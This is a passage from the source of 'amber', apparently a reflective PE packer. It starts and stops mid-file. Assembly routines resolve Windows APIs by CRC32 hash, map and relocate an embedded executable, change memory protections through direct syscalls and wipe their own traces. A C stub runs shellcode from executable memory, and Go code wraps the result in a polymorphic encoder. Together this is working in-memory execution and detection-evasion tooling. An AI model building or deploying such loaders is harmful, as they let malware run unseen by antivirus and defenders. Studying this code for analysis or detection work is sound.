24 | loc_1400039d9:
25 | crc32 eax,dl
26 | add rcx,0x1
27 | movzx edx,BYTE [rcx-0x1]
28 | test dl,dl
29 | jne loc_1400039d9
30 | loc_1400039ea:
31 | ret
32 | loc_1400039eb:
33 | mov eax,0x0
34 | jmp loc_1400039ea
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/get_module_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | get_module_by_crc:
5 | push rdi
6 | push rsi
7 | push rbx
8 | sub rsp,0x20
9 | mov esi,ecx
10 | mov rax,QWORD gs:0x60
11 | mov rax,QWORD [rax+0x18]
12 | lea rdi,[rax+0x20]
13 | mov rbx,QWORD [rax+0x20]
14 | cmp rdi,rbx
15 | je loc_140102e89
16 | loc_140102e5d:
17 | movzx edx,WORD [rbx+0x48]
18 | mov rcx,QWORD [rbx+0x50]
19 | call calc_crc
20 | cmp eax,esi
21 | je loc_140102e7d
22 | mov rbx,QWORD [rbx]
23 | cmp rdi,rbx
24 | jne loc_140102e5d
25 | mov eax,0x0
26 | jmp loc_140102e81
27 | loc_140102e7d:
28 | mov rax,QWORD [rbx+0x20]
29 | loc_140102e81:
30 | add rsp,0x20
31 | pop rbx
32 | pop rsi
33 | pop rdi
34 | ret
35 | loc_140102e89:
36 | mov eax,0x0
37 | jmp loc_140102e81
38 |
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/get_proc_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | get_proc_by_crc:
5 | push r15
6 | push r14
7 | push r13
8 | push r12
9 | push rbp
10 | push rdi
11 | push rsi
12 | push rbx
13 | sub rsp,0x258
14 | mov rbx,rcx
15 | mov r13d,edx
16 | mov ebp,r8d
17 | movsxd rax,DWORD [rcx+0x3c]
18 | add rax,rcx
19 | mov esi,DWORD [rax+0x88]
20 | add rsi,rcx
21 | mov eax,DWORD [rax+0x8c]
22 | mov DWORD [rsp+0x2c],eax
23 | mov r12d,DWORD [rsi+0x20]
24 | mov r14d,DWORD [rsi+0x1c]
25 | mov r15d,DWORD [rsi+0x24]
26 | mov eax,DWORD [rsi+0x18]
27 | test eax,eax
28 | je loc_140003764
29 | mov eax,eax
30 | mov QWORD [rsp+0x20],rax
31 | mov edi,0x0
32 | add r12,rcx
33 | loc_1400035dc:
34 | mov ecx,DWORD [r12+rdi*4]
35 | add rcx,rbx
36 | mov edx,0x0
37 | call calc_crc
38 | cmp ebp,edi
39 | je loc_14000360b
40 | cmp eax,r13d
41 | je loc_14000360b
42 | add rdi,0x1
43 | cmp QWORD [rsp+0x20],rdi
44 | jne loc_1400035dc
45 | mov eax,0x0
46 | jmp loc_140003738
47 | loc_14000360b:
48 | lea rax,[rbx+rdi*2]
49 | movzx eax,WORD [rax+r15*1]
50 | lea rax,[rbx+rax*4]
51 | mov eax,DWORD [rax+r14*1]
52 | add rbx,rax
53 | cmp rbx,rsi
54 | jb loc_140003735
55 | mov eax,DWORD [rsp+0x2c]
56 | add rsi,rax
57 | cmp rbx,rsi
58 | jae loc_140003735
59 | mov QWORD [rsp+0x30],0x0
60 | mov QWORD [rsp+0x38],0x0
61 | lea rdi,[rsp+0x40]
62 | mov eax,0x0
63 | mov ecx,0x1e
64 | rep stosq
65 | mov DWORD [rdi],0x0
66 | mov QWORD [rsp+0x140],0x0
67 | mov QWORD [rsp+0x148],0x0
68 | lea rdi,[rsp+0x150]
69 | mov ecx,0x1e
70 | rep stosq
71 | mov DWORD [rdi],0x0
72 | cmp BYTE [rbx],0x2e
73 | je loc_14000374c
74 | mov eax,0x1
75 | loc_14000369e:
76 | mov r8,rax
77 | add rax,0x1
78 | cmp BYTE [rbx+rax*1-0x1],0x2e
79 | jne loc_14000369e
80 | mov esi,r8d
81 | loc_1400036af:
82 | lea rcx,[rsp+0x30]
83 | mov rdx,rbx
84 | call memcpy
85 | lea ecx,[rsi+0x1]
86 | movsxd rcx,ecx
87 | add rcx,rbx
88 | cmp BYTE [rcx],0x0
89 | je loc_14000375c
90 | mov eax,0x1
91 | movsxd rdx,esi
92 | add rdx,rbx
93 | loc_1400036d9:
94 | mov r8,rax
95 | add rax,0x1
96 | cmp BYTE [rdx+rax*1],0x0
97 | jne loc_1400036d9
98 | loc_1400036e6:
99 | lea rax,[rsp+0x140]
100 | mov rdx,rcx
101 | mov rcx,rax
102 | call memcpy
103 | lea rcx,[rsp+0x30]
104 | call load_module
105 | mov rbx,rax
106 | mov eax,0x0
107 | test rbx,rbx
108 | je loc_140003738
109 | lea rcx,[rsp+0x140]
110 | mov edx,0x0
111 | call calc_crc
112 | mov edx,eax
113 | mov r8d,0xffffffff
114 | mov rcx,rbx
115 | call get_proc_by_crc
116 | mov rbx,rax
117 | loc_140003735:
118 | mov rax,rbx
119 | loc_140003738:
120 | add rsp,0x258
121 | pop rbx
122 | pop rsi
123 | pop rdi
124 | pop rbp
125 | pop r12
126 | pop r13
127 | pop r14
128 | pop r15
129 | ret
130 | loc_14000374c:
131 | mov esi,0x0
132 | mov r8d,0x0
133 | jmp loc_1400036af
134 | loc_14000375c:
135 | mov r8d,0x0
136 | jmp loc_1400036e6
137 | loc_140003764:
138 | mov eax,0x0
139 | jmp loc_140003738
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/load_module.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | load_module:
5 | push rdi
6 | sub rsp,0x250
7 | mov r8,rcx
8 | mov QWORD [rsp+0x248],0x0
9 | mov DWORD [rsp+0x234],0x0
10 | lea rdi,[rsp+0x20]
11 | mov ecx,0x41
12 | mov eax,0x0
13 | rep stosq
14 | cmp BYTE [r8],0x0
15 | je loc_140003873
16 | mov edx,0x1
17 | loc_1400037eb:
18 | mov rax,rdx
19 | add rdx,0x1
20 | cmp BYTE [r8+rdx*1-0x1],0x0
21 | jne loc_1400037eb
22 | lea edx,[rax+rax*1]
23 | mov WORD [rsp+0x230],dx
24 | add edx,0x2
25 | mov WORD [rsp+0x232],dx
26 | lea rdx,[rsp+0x20]
27 | mov QWORD [rsp+0x238],rdx
28 | sub eax,0x1
29 | js loc_140003837
30 | cdqe
31 | loc_140003824:
32 | movsx dx,BYTE [r8+rax*1]
33 | mov WORD [rsp+rax*2+0x20],dx
34 | sub rax,0x1
35 | test eax,eax
36 | jns loc_140003824
37 | loc_140003837:
38 | lea r9,[rsp+0x248]
39 | lea r8,[rsp+0x230]
40 | mov edx,0x0
41 | mov ecx,0x0
42 | mov r10, 0xB4EBB9A4
43 | call api_call
44 | call rax ;
45 | test eax,eax
46 | js loc_14000386c
47 | mov rax,QWORD [rsp+0x248]
48 | loc_140003863:
49 | add rsp,0x250
50 | pop rdi
51 | ret
52 | loc_14000386c:
53 | mov eax,0x0
54 | jmp loc_140003863
55 | loc_140003873:
56 | mov WORD [rsp+0x230],0x0
57 | mov WORD [rsp+0x232],0x2
58 | lea rax,[rsp+0x20]
59 | mov QWORD [rsp+0x238],rax
60 | jmp loc_140003837
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/map_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | map_image:
5 | push rbp
6 | push rdi
7 | push rsi
8 | push rbx
9 | sub rsp,0x48
10 | mov rbp,rcx
11 | movsxd rdi,DWORD [rcx+0x3c]
12 | add rdi,rcx
13 | mov eax,0x0
14 | cmp DWORD [rdi],0x4550
15 | jne loc_1400020b8
16 | mov QWORD [rsp+0x38],0x0
17 | mov eax,DWORD [rdi+0x50]
18 | mov QWORD [rsp+0x30],rax
19 | lea rdx,[rsp+0x38]
20 | mov DWORD [rsp+0x28],0x4
21 | mov DWORD [rsp+0x20],0x103000
22 | lea r9,[rsp+0x30]
23 | mov r8d,0x0
24 | mov rcx,0xffffffffffffffff
25 | mov r10, 0x99CE7C55
26 | call api_call
27 | mov r10,rax
28 | call syscall_api
29 | ;call rax ;
30 | mov edx,eax
31 | mov eax,0x0
32 | test edx,edx
33 | js loc_1400020b8
34 | mov r8d,DWORD [rdi+0x54]
35 | mov rdx,rbp
36 | mov rcx,QWORD [rsp+0x38]
37 | call memcpy
38 | movzx eax,WORD [rdi+0x14]
39 | lea rbx,[rdi+rax*1+0x18]
40 | cmp WORD [rdi+0x6],0x0
41 | je loc_1400020b3
42 | mov esi,0x0
43 | loc_14000208d:
44 | mov ecx,DWORD [rbx+0xc]
45 | add rcx,QWORD [rsp+0x38]
46 | mov edx,DWORD [rbx+0x14]
47 | add rdx,rbp
48 | mov r8d,DWORD [rbx+0x10]
49 | call memcpy
50 | add esi,0x1
51 | add rbx,0x28
52 | movzx eax,WORD [rdi+0x6]
53 | cmp eax,esi
54 | jg loc_14000208d
55 | loc_1400020b3:
56 | mov rax,QWORD [rsp+0x38]
57 | loc_1400020b8:
58 | add rsp,0x48
59 | pop rbx
60 | pop rsi
61 | pop rdi
62 | pop rbp
63 | ret
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/memcpy.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 | ; memcpy(&dst, &src, size)
4 | ; RCX = &dst
5 | ; RDX = &src
6 | ; R8 = size
7 | memcpy:
8 | push rsi
9 | push rdi
10 | mov rdi,rcx
11 | mov rsi,rdx
12 | mov rcx,r8
13 | copy_byte:
14 | rep movsb ; Copy the CX number of bytes from RSI to RDI
15 | pop rdi ; Restore RDI
16 | pop rsi ; Restore RSI
17 | ret ; Return
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/protect_sections.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | protect_sections:
5 | push r14
6 | push r13
7 | push r12
8 | push rbp
9 | push rdi
10 | push rsi
11 | push rbx
12 | sub rsp,0x50
13 | mov rbp,rcx
14 | movsxd rdi,DWORD [rcx+0x3c]
15 | add rdi,rcx
16 | movzx eax,WORD [rdi+0x14]
17 | lea rbx,[rdi+rax*1+0x18]
18 | mov QWORD [rsp+0x48],0x0
19 | cmp WORD [rdi+0x6],0x0
20 | je loc_140002e87
21 | mov esi,0x0
22 | mov r12d,0x0
23 | lea r14,[rsp+0x40]
24 | lea r13,[rsp+0x48]
25 | jmp loc_140002f50
26 | loc_140002e38:
27 | mov ecx,0x1
28 | loc_140002e3d:
29 | and eax,0x60000000
30 | mov r8d,0x1
31 | cmp eax,0x60000000
32 | mov r9d,0x20
33 | mov eax,0x80
34 | cmovne r9d,eax
35 | jmp loc_140002eed
36 | loc_140002e61:
37 | mov r9d,0x20
38 | jmp loc_140002efd
39 | loc_140002e6c:
40 | mov eax,0x0
41 | jmp loc_140002e78
42 | loc_140002e73:
43 | mov eax,0x1
44 | loc_140002e78:
45 | add rsp,0x50
46 | pop rbx
47 | pop rsi
48 | pop rdi
49 | pop rbp
50 | pop r12
51 | pop r13
52 | pop r14
53 | ret
54 | loc_140002e87:
55 | mov eax,0x1
56 | jmp loc_140002e78
57 | loc_140002e8e:
58 | mov ecx,0x1
59 | mov r8d,r12d
60 | mov r9d,0x10
61 | jmp loc_140002edd
62 | loc_140002e9e:
63 | mov ecx,r12d
64 | test eax,0x20000000
65 | je loc_140002eda
66 | mov ecx,0x0
67 | test eax,eax
68 | js loc_140002e3d
69 | mov ecx,eax
70 | shr ecx,0x1f
71 | mov r8d,ecx
72 | mov ecx,r12d
73 | mov r9d,0x10
74 | jmp loc_140002edd
75 | loc_140002ec4:
76 | test eax,0x20000000
77 | jne loc_140002e38
78 | mov ecx,0x1
79 | mov r9d,0x4
80 | loc_140002eda:
81 | mov r8d,r12d
82 | loc_140002edd:
83 | and eax,0x60000000
84 | cmp eax,0x60000000
85 | je loc_140002e61
86 | loc_140002eed:
87 | test cl,cl
88 | je loc_140002efd
89 | test r8b,r8b
90 | mov eax,0x40
91 | cmovne r9d,eax
92 | loc_140002efd:
93 | mov eax,DWORD [rdx+0xc]
94 | add rax,rbp
95 | mov QWORD [rsp+0x48],rax
96 | mov eax,DWORD [rdx+0x10]
97 | mov QWORD [rsp+0x40],rax
98 | mov DWORD [rsp+0x3c],0x0
99 | lea rax,[rsp+0x3c]
100 | mov QWORD [rsp+0x20],rax
101 | mov r8,r14
102 | mov rdx,r13
103 | mov rcx,0xffffffffffffffff
104 | mov r10, 0x6EDE4D41
105 | call api_call
106 | mov r10,rax ;
107 | call syscall_api
108 | test eax,eax
109 | js loc_140002e6c
110 | loc_140002f3d:
111 | add esi,0x1
112 | add rbx,0x28
113 | movzx eax,WORD [rdi+0x6]
114 | cmp eax,esi
115 | jle loc_140002e73
116 | loc_140002f50:
117 | mov rdx,rbx
118 | mov eax,DWORD [rbx+0x24]
119 | test eax,eax
120 | je loc_140002f3d
121 | mov r9d,eax
122 | sar r9d,0x1f
123 | and r9d,0xffffffc8
124 | add r9d,0x40
125 | test eax,0x40000000
126 | je loc_140002e9e
127 | test eax,eax
128 | js loc_140002ec4
129 | test eax,0x20000000
130 | jne loc_140002e8e
131 | mov ecx,0x1
132 | mov r9d,0x2
133 | jmp loc_140002eda
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/relocate_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | relocate_image:
5 | mov r9,rcx
6 | movsxd rdx,DWORD [rcx+0x3c]
7 | add rdx,rcx
8 | mov eax,DWORD [rdx+0xb0]
9 | mov ecx,0x0
10 | test eax,eax
11 | je loc_14000261a
12 | mov eax,eax
13 | lea rcx,[r9+rax*1]
14 | mov r10,r9
15 | sub r10,QWORD [rdx+0x30]
16 | cmp DWORD [rcx],0x0
17 | jne loc_140002601
18 | mov ecx,0x1
19 | jmp loc_14000261a
20 | loc_1400025bd:
21 | mov edx,DWORD [rcx]
22 | movzx r8d,WORD [rax]
23 | and r8d,0xfff
24 | add rdx,r8
25 | add QWORD [r9+rdx*1],r10
26 | loc_1400025d1:
27 | add rax,0x2
28 | mov edx,DWORD [rcx+0x4]
29 | add rdx,rcx
30 | cmp rax,rdx
31 | je loc_1400025f9
32 | loc_1400025e0:
33 | movzx edx,BYTE [rax+0x1]
34 | mov r8d,edx
35 | and r8d,0xfffffff0
36 | cmp r8b,0xa0
37 | je loc_1400025bd
38 | cmp dl,0xf
39 | jbe loc_1400025d1
40 | jmp loc_1400025d1
41 | loc_1400025f9:
42 | mov rcx,rax
43 | loc_1400025fc:
44 | cmp DWORD [rcx],0x0
45 | je loc_140002615
46 | loc_140002601:
47 | lea rax,[rcx+0x8]
48 | mov edx,DWORD [rcx+0x4]
49 | add rdx,rcx
50 | cmp rax,rdx
51 | jne loc_1400025e0
52 | mov rcx,rdx
53 | jmp loc_1400025fc
54 | loc_140002615:
55 | mov ecx,0x1
56 | loc_14000261a:
57 | mov eax,ecx
58 | ret
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/resolve_imports.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | resolve_imports:
5 | push r12
6 | push rbp
7 | push rdi
8 | push rsi
9 | push rbx
10 | sub rsp,0x20
11 | mov rbp,rcx
12 | movsxd rax,DWORD [rcx+0x3c]
13 | mov eax,DWORD [rcx+rax*1+0x90]
14 | mov edx,0x0
15 | test eax,eax
16 | je loc_140002966
17 | mov eax,eax
18 | lea r12,[rcx+rax*1]
19 | mov ecx,DWORD [r12+0xc]
20 | test ecx,ecx
21 | jne loc_14000292f
22 | mov edx,0x1
23 | jmp loc_140002966
24 | loc_1400028cf:
25 | mov edx,0x0
26 | mov rcx,rdi
27 | call get_proc_by_crc
28 | test rax,rax
29 | je loc_1400028e4
30 | mov QWORD [rsi],rax
31 | loc_1400028e4:
32 | add rbx,0x8
33 | add rsi,0x8
34 | mov r8,QWORD [rbx]
35 | test r8,r8
36 | je loc_140002922
37 | loc_1400028f4:
38 | test r8,r8
39 | js loc_1400028cf
40 | lea rcx,[rbp+r8*1+0x2]
41 | mov edx,0x0
42 | call calc_crc
43 | mov edx,eax
44 | mov r8d,0xffffffff
45 | mov rcx,rdi
46 | call get_proc_by_crc
47 | test rax,rax
48 | je loc_1400028e4
49 | mov QWORD [rsi],rax
50 | loc_140002920:
51 | jmp loc_1400028e4
52 | loc_140002922:
53 | add r12,0x14
54 | mov ecx,DWORD [r12+0xc]
55 | test ecx,ecx
56 | je loc_14000295a
57 | loc_14000292f:
58 | mov ecx,ecx
59 | add rcx,rbp
60 | call load_module
61 | mov rdi,rax
62 | test rax,rax
63 | je loc_140002961
64 | mov ebx,DWORD [r12]
65 | add rbx,rbp
66 | mov esi,DWORD [r12+0x10]
67 | add rsi,rbp
68 | mov r8,QWORD [rbx]
69 | test r8,r8
70 | jne loc_1400028f4
71 | jmp loc_140002922
72 | loc_14000295a:
73 | mov edx,0x1
74 | jmp loc_140002966
75 | loc_140002961:
76 | mov edx,0x0
77 | loc_140002966:
78 | mov eax,edx
79 | add rsp,0x20
80 | pop rbx
81 | pop rsi
82 | pop rdi
83 | pop rbp
84 | pop r12
85 | ret
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/run_tls_callbacks.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | run_tls_callbacks:
5 | push rsi
6 | push rbx
7 | sub rsp,0x28
8 | mov rsi,rcx
9 | movsxd rax,DWORD [rcx+0x3c]
10 | mov eax,DWORD [rcx+rax*1+0xd0]
11 | mov edx,0x0
12 | test eax,eax
13 | je loc_1400033ad
14 | mov eax,eax
15 | mov rbx,QWORD [rcx+rax*1+0x18]
16 | mov edx,0x1
17 | test rbx,rbx
18 | jne loc_1400033ca
19 | loc_1400033ad:
20 | mov eax,edx
21 | add rsp,0x28
22 | pop rbx
23 | pop rsi
24 | ret
25 | loc_1400033b6:
26 | mov r8d,0x0
27 | mov edx,0x1
28 | mov rcx,rsi
29 | call rax
30 | add rbx,0x8
31 | loc_1400033ca:
32 | mov rax,QWORD [rbx]
33 | test rax,rax
34 | jne loc_1400033b6
35 | mov edx,0x1
36 | jmp loc_1400033ad
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/stub.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include "shellcode.h"
3 |
4 | int main(int argc, char const *argv[])
5 | {
6 | char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
7 | memcpy(BUFFER, shellcode, sizeof(shellcode));
8 | (*(void(*)())BUFFER)();
9 | return 0;
10 | }
11 |
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/syscall-loader-x64.asm:
--------------------------------------------------------------------------------
1 | ;#==============================================#
2 | ;# X64 Reflective Loader #
3 | ;# Author: Ege Balcı #
4 | ;# Version: 3.0 #
5 | ;#==============================================#
6 | ;
7 | [BITS 64]
8 |
9 | %define e_lfanew 0x3C
10 | %define _AddressOfEntry 0x28
11 |
12 | call start ; Get the address of PE image to stack
13 | incbin "putty.exe" ; PE file.
14 | start:
15 | pop rsi ; Get the address of PE to RSI
16 | push rbp ; Save RBP
17 | mov rbp,rsp ; Create a stack frame
18 | mov rcx,rsi ; Move the image address as first parameter
19 | call map_image ; Perform PE image mapping
20 | mov rdi, rax ; Get the address of mapped PE image into RDI
21 | mov rcx, rdi ; Move a copy of the mapped image address into RCX as first parameter
22 | call resolve_imports ; Resolve image imports
23 | mov rcx, rdi ; Set the mapped image address as first parameter
24 | call relocate_image ; Perform image base relocation
25 | mov rcx, rdi ; Set the mapped image address as first parameter
26 | call protect_sections ; Apply proper section memory protections
27 | mov rcx, rdi ; Set the mapped image address as first parameter
28 | call run_tls_callbacks ; Try to execute TLS callbacks. May fail... ¯\_(ツ)_/¯
29 | xor rax, rax ; Clear out RAX
30 | mov eax, DWORD [rdi+e_lfanew] ; Get the file header offset
31 | mov eax, DWORD [rdi+rax+_AddressOfEntry] ; Get the AddressOfEntry into EAX
32 | add rax,rdi ; Add the AOE onto new image base
33 | jmp wipe ; Start wiping memory artifacts...
34 | ; ------------------------ FUNCTIONS ------------------------------------
35 | %include "./inc/memcpy.asm"
36 | %include "./inc/calc_crc.asm"
37 | %include "./inc/map_image.asm"
38 | %include "./inc/load_module.asm"
39 | %include "./inc/relocate_image.asm"
40 | %include "./inc/resolve_imports.asm"
41 | %include "./inc/get_proc_by_crc.asm"
42 | %include "./inc/get_module_by_crc.asm"
43 | %include "./inc/protect_sections.asm"
44 | %include "./inc/run_tls_callbacks.asm"
45 | %include "../crc32_api/crc32_api_x64.asm"
46 | %include "../syscall_api/syscall_api.asm"
47 | ;------------------------ FUNCTIONS -------------------------------------
48 | wipe:
49 | wipe_code_size equ wipe_end-(wipe)
50 | call $+5 ; Get current EIP to stack
51 | pop rcx ; Pop currect EIP to RCX
52 | sub rcx,rsi ; Calculate the size of the PE file
53 | add rcx,wipe_code_size ; Add the size of wipe code
54 | mov rdi,rsi ; Move the PE address to RDI
55 | sub rdi,0x5 ; Go back 5 bytes for wiping the initial call as well
56 | wipe_end:
57 | rep stosb ; Store AL into RDI and decrement RDI until RCX = 0
58 | ; -------------------- SWITCH TO PE ----------------------------
59 | cld ; Clear direction flags
60 | mov rsp, rbp ; Restore stack frame
61 | pop rbp ; Restore RBP
62 | jmp rax ; Jmp to the PE->AOE
--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "os"
5 | "time"
6 |
7 | "github.com/EgeBalci/amber/config"
8 | amber "github.com/EgeBalci/amber/pkg"
9 | "github.com/EgeBalci/amber/utils"
10 | sgn "github.com/EgeBalci/sgn/pkg"
11 | "github.com/briandowns/spinner"
12 | "github.com/fatih/color"
13 | )
14 |
15 | // Set globals...
16 | var spinr = spinner.New(spinner.CharSets[9], 30*time.Millisecond)
17 |
18 | func main() {
19 | printBanner()
20 | cfg, err := config.Parse()
21 | if err != nil {
22 | utils.PrintFatal(err)
23 | }
24 |
25 | encoder, err := sgn.NewEncoder(64)
26 | if err != nil {
27 | utils.PrintFatal(err)
28 | }
29 | encoder.EncodingCount = cfg.EncodeCount
30 | encoder.ObfuscationLimit = cfg.ObfuscationLimit
31 | cfg.PrintSummary()
32 | // ------------------------------
33 | pe, err := amber.Open(cfg.FileName)
34 | if err != nil {
35 | utils.PrintFatal(err)
36 | }
37 | pe.SyscallLoader = cfg.UseSyscalls
38 |
39 | if !pe.HasRelocData {
40 | utils.PrintErr("%s has no relocation data. Exiting...\n", pe.Name)
41 | return
42 | // if pe.ImageBase != 0x400000 {
43 | // utils.PrintErr("Can't switch to fixed address loader because ImageBase mismatch!\n")
44 | // }
45 | // utils.PrintStatus("Switching to fixed address loader...\n")
46 | }
47 |
48 | payload, err := pe.AssembleLoader()
49 | if err != nil {
50 | utils.PrintFatal(err)
51 | }
52 |
53 | if encoder.EncodingCount > 0 {
54 | spinr.Start()
55 | spinr.Suffix = " Encoding reflective payload..."
56 | encoder.SetArchitecture(pe.Architecture)
57 | payload, err = encoder.Encode(payload)
58 | if err != nil {
59 | utils.PrintFatal(err)
60 | }
61 | spinr.Stop()
62 | }
63 |
64 | outFile, err := os.Create(cfg.OutputFile)
65 | if err != nil {
66 | utils.PrintFatal(err)
67 | }
68 |
69 | outFile.Write(payload)
70 | defer outFile.Close()
71 |
72 | finSize, err := utils.GetFileSize(cfg.OutputFile)
73 | if err != nil {
74 | utils.PrintFatal(err)
75 | }
76 | utils.PrintStatus("Final Size: %d bytes\n", finSize)
77 | utils.PrintStatus("Output File: %s\n", cfg.OutputFile)
78 | utils.PrintGreen("[✔] Reflective PE generated !\n")
79 | }
80 |
81 | // BANNER .
82 | const BANNER string = `
83 |
84 | // █████╗ ███╗ ███╗██████╗ ███████╗██████╗
85 | // ██╔══██╗████╗ ████║██╔══██╗██╔════╝██╔══██╗
86 | // ███████║██╔████╔██║██████╔╝█████╗ ██████╔╝
87 | // ██╔══██║██║╚██╔╝██║██╔══██╗██╔══╝ ██╔══██╗
88 | // ██║ ██║██║ ╚═╝ ██║██████╔╝███████╗██║ ██║
89 | // ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝
90 | // Reflective PE Packer ☣ Copyright (c) 2017 EGE BALCI
91 | // %s - %s
92 |
93 | `
94 |
95 | func printBanner() {
96 | green := color.New(color.FgGreen).Add(color.Bold)
97 | red := color.New(color.FgRed).Add(color.Bold)
98 | blue := color.New(color.FgBlue).Add(color.Bold)
99 | red.Printf(BANNER, green.Sprintf("v%s", config.Version), blue.Sprintf("https://github.com/egebalci/amber"))
100 | }
101 |
--------------------------------------------------------------------------------
/pkg/amber.go:
--------------------------------------------------------------------------------
1 | package amber
2 |
3 | import (
4 | "bytes"
5 | "encoding/binary"
6 | "errors"
7 | "path/filepath"
8 |
9 | "github.com/EgeBalci/amber/utils"
10 | pe "github.com/EgeBalci/debug/pe"
11 | )
12 |
13 | const (
14 | PE_DOS_STUB = "This program cannot be run in DOS mode"
15 | )
16 |
17 | var (
18 | ErrUnsupportedArch = errors.New("unsupported PE file architecture")
19 | ErrInvalidPeSpecs = errors.New("unsupported PE file specs")
20 | ErrInvalidPeHeaders = errors.New("invalid PE headers")
21 | )
22 |
23 | // Blueprint structure contains PE specs, tool parameters and
24 | // OS spesific info
25 | type PE struct {
26 | Name string
27 | FullName string
28 | FileSize int
29 | IAT bool
30 | Resource bool
31 | IgnoreIntegrity bool
32 | IatResolver bool
33 | SyscallLoader bool
34 | ScrapeHeaders bool
35 | // PE specs...
36 | Architecture int
37 | SizeOfImage uint32
38 | ImageBase uint64
39 | AddressOfEntry uint32
40 | Subsystem uint16
41 | ImportTable uint64
42 | ExportTable uint64
43 | RelocTable uint64
44 | ImportAdressTable uint64
45 | HasBoundedImports bool
46 | HasDelayedImports bool
47 | HasTLSCallbacks bool
48 | HasRelocData bool
49 | IsCLR bool
50 | IsDLL bool
51 |
52 | // PE File
53 | file *pe.File
54 | }
55 |
56 | func Open(fileName string) (bp *PE, err error) {
57 | bp = new(PE)
58 | bp.Name = fileName
59 | bp.FullName, err = filepath.Abs(fileName)
60 | if err != nil {
61 | return
62 | }
63 |
64 | bp.file, err = pe.Open(bp.FullName)
65 | if err != nil {
66 | return
67 | }
68 |
69 | switch bp.file.FileHeader.Machine {
70 | case pe.IMAGE_FILE_MACHINE_I386:
71 | bp.Architecture = 32
72 | case pe.IMAGE_FILE_MACHINE_AMD64:
73 | bp.Architecture = 64
74 | default:
75 | return nil, ErrUnsupportedArch
76 | }
77 |
78 | // Fetch OptionalHeader values to blueprint
79 | switch hdr := (bp.file.OptionalHeader).(type) {
80 | case *pe.OptionalHeader32:
81 | // cast those back to a uint32 before use in 32bit
82 | bp.ImageBase = uint64(hdr.ImageBase)
83 | bp.Subsystem = hdr.Subsystem
84 | bp.SizeOfImage = hdr.SizeOfImage
85 |
86 | bp.IsDLL = bp.file.Characteristics == (bp.file.Characteristics | pe.IMAGE_FILE_DLL)
87 | bp.HasRelocData = hdr.DataDirectory[5].Size != 0x00
88 | bp.HasBoundedImports = hdr.DataDirectory[11].Size != 0x00
89 | bp.HasDelayedImports = hdr.DataDirectory[13].Size != 0x00
90 | bp.IsCLR = hdr.DataDirectory[14].Size != 0x00
91 |
92 | bp.ExportTable = uint64(hdr.DataDirectory[0].VirtualAddress + uint32(hdr.ImageBase))
93 | bp.ImportTable = uint64(hdr.DataDirectory[1].VirtualAddress + uint32(hdr.ImageBase))
94 | bp.RelocTable = uint64(hdr.DataDirectory[5].VirtualAddress + uint32(hdr.ImageBase))
95 | bp.ImportAdressTable = uint64(hdr.DataDirectory[12].VirtualAddress + uint32(hdr.ImageBase))
96 | case *pe.OptionalHeader64:
97 | bp.ImageBase = hdr.ImageBase
98 | bp.Subsystem = hdr.Subsystem
99 | bp.SizeOfImage = hdr.SizeOfImage
100 |
101 | bp.IsDLL = bp.file.Characteristics == (bp.file.Characteristics | pe.IMAGE_FILE_DLL)
102 | bp.HasRelocData = hdr.DataDirectory[5].Size != 0x00
103 | bp.HasBoundedImports = hdr.DataDirectory[11].Size != 0x00
104 | bp.HasDelayedImports = hdr.DataDirectory[13].Size != 0x00
105 | bp.IsCLR = hdr.DataDirectory[14].Size != 0x00
106 |
107 | bp.ExportTable = uint64(hdr.DataDirectory[0].VirtualAddress + uint32(hdr.ImageBase))
108 | bp.ImportTable = uint64(hdr.DataDirectory[1].VirtualAddress + uint32(hdr.ImageBase))
109 | bp.RelocTable = uint64(hdr.DataDirectory[5].VirtualAddress + uint32(hdr.ImageBase))
110 | bp.ImportAdressTable = uint64(hdr.DataDirectory[12].VirtualAddress + uint32(hdr.ImageBase))
111 | }
112 |
113 | bp.FileSize, err = utils.GetFileSize(bp.FullName)
114 | return
115 | }
116 |
117 | // AssemblePayload generates the binary stub bla bla...
118 | func (pe *PE) AssembleLoader() ([]byte, error) {
119 |
120 | var (
121 | rawFile = pe.file.RawBytes
122 | err error
123 | )
124 |
125 | if pe.ScrapeHeaders {
126 | rawFile, err = pe.ScrapePeHeaders()
127 | if err != nil {
128 | return nil, err
129 | }
130 | }
131 |
132 | // Add a call over the given binary
133 | payload, err := pe.AddCallOver(rawFile)
134 | if err != nil {
135 | return nil, err
136 | }
137 |
138 | // Decide on the architecture, API block, and loader types...
139 | // we have 3 pre-assembled loaders for public version of amber.
140 | switch pe.Architecture {
141 | case 32:
142 | if pe.SyscallLoader {
143 | return nil, errors.New("syscall loader only supports 64 bit PE files")
144 | }
145 | payload = append(payload, LOADER_32...)
146 | case 64:
147 | if pe.SyscallLoader {
148 | payload = append(payload, SYSCALL_LOADER_64...)
149 | } else {
150 | payload = append(payload, LOADER_64...)
151 | }
152 |
153 | default:
154 | return nil, ErrUnsupportedArch
155 | }
156 |
157 | if pe.IatResolver {
